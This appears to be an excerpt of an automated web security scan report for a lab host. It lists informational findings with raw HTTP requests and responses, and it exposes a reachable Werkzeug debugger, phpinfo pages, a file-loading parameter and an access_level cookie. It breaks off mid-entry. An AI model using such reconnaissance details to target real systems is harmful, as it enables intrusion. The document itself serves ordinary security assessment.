<html lang="en-US" class="no-js">
<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="profile" href="http://gmpg.org/xfn/11">
       <script>
...[SNIP]...
</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com'>
<link rel='dns-prefetch' href='//s.w.org'>
<link rel="alternate" type="application/rss+xml" title="Fairweather &amp; sons &raquo; Feed" href="http://10.250.200.5/feed/" />
...[SNIP]...
</style>
<link rel='stylesheet' id='twentysixteen-fonts-css' href='https://fonts.googleapis.com/css?family=Merriweather%3A400%2C700%2C900%2C400italic%2C700italic%2C900italic%7CMontserrat%3A400%2C700%7CInconsolata%3A400&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='genericons-css' href='http://10.250.200.5/wp-content/themes/twentysixteen/genericons/genericons.css?ver=3.4.1' type='text/css' media='all' />
...[SNIP]...
<li><a href="https://wordpress.org/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a>
...[SNIP]...
</span>
               <a href="https://wordpress.org/">Proudly powered by WordPress</a>
...[SNIP]...
3.5.2. http://10.250.200.5/wp-login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The page was loaded from a URL containing a query string (/wp-login.php?action=lostpassword). The response contains links to the following other domains: s.w.org and wordpress.org.

Request 1

GET /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/wp-login.php
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:11 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 1866
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
</title>
   <link rel='dns-prefetch' href='//s.w.org'>
<link rel='stylesheet' href='http://10.250.200.5/wp-admin/load-styles.php?c=0&amp;dir=ltr&amp;load%5B%5D=dashicons,buttons,forms,l10n,login&amp;ver=4.6' type='text/css' media='all' />
...[SNIP]...
<h1><a href="https://wordpress.org/" title="Powered by WordPress" tabindex="-1">Fairweather &#038; sons</a>
...[SNIP]...
3.5.3. http://10.250.200.5:81/sys2_test.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Issue detail

The page was loaded from a URL containing a query string (/sys2_test.php?test=). The response contains a link to another domain: fairweathersons.local.

Request 1

GET /sys2_test.php?test= HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
3.5.4. http://10.250.200.5:8080/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request 1

GET /?__debugger__=yes&cmd=paste HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:03 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/css/sb-admin-2.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.5.5. http://10.250.200.5:8080/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /login

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request 1

GET /login?pin=555-555-0199@example.com&btn=Confirm%2bPin HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/login
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
X-XSS-Protection: 0
Connection: close
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:52 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>KeyError: 'userNone_username' // Werkzeug Debugger</title>
<link
...[SNIP]...
<span
class="pastemessage">You can also paste this traceback into
a <a href="https://gist.github.com/">gist</a>
...[SNIP]...
3.6. Cross-domain script include

There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. Applications that rely on third-party scripts should consider copying the contents of these scripts onto their own domain and including them from there. If that is not possible (e.g. for licensing reasons) then consider reimplementing the script's functionality within application code.

3.6.1. http://10.250.200.5:8080/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/css/sb-admin-2.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.6.2. http://10.250.200.5:8080/admin-networking.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /admin-networking.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET /admin-networking.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6553
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:19 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.6.3. http://10.250.200.5:8080/admin-system.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /admin-system.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET /admin-system.html HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5039
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.6.4. http://10.250.200.5:8080/admin-users.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /admin-users.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET /admin-users.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5624
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:30 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.7. Cookie without HttpOnly flag set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure makes certain client-side attacks, such as cross-site scripting, slightly harder to exploit by preventing them from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
3.8. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
<td>
                       <input type="file" name="picture" />
                   </td>
...[SNIP]...
3.9. Frameable response (potential Clickjacking)

There are 28 instances of this issue:

Issue description

If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.

Note that some applications attempt to prevent these attacks from within the HTML page itself, using "framebusting" code. However, this type of defense is normally ineffective and can usually be circumvented by a skilled attacker.

You should determine whether any functions accessible within frameable pages can be used by application users to perform any sensitive actions within the application.

Issue remediation

To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Note that the SAMEORIGIN header can be partially bypassed if the application itself can be made to frame untrusted websites.


3.9.1. http://10.250.200.5/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:48 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
Content-Length: 9520
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="profile" href="http://gmpg.org/xfn/11
...[SNIP]...
3.9.2. http://10.250.200.5/search/555-555-0199@example.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5
Path:   /search/555-555-0199@example.com/

Request 1

GET /search/555-555-0199@example.com/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:45:32 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9850

<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="profile" href="http://gmpg.org/xfn/11
...[SNIP]...
3.9.3. http://10.250.200.5:81/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 8273
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.9.4. http://10.250.200.5:81/contactus.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /contactus.php

Request 1

GET /contactus.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1761
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: f in <b>/var/www/html/contactus.php</b> on line <b>7</b><br />
<br />
<b>Warning</b>: file_get_contents(): Filename cannot be empty in <b>/var/www/html/contact
...[SNIP]...
3.9.5. http://10.250.200.5:81/login

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
3.9.6. http://10.250.200.5:81/phpinfo.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /phpinfo.php

Request 1

GET /phpinfo.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:06 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.9.7. http://10.250.200.5:81/phpinfo.php/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.9.8. http://10.250.200.5:81/register

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /register

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
3.9.9. http://10.250.200.5:81/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search

Request 1

GET /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

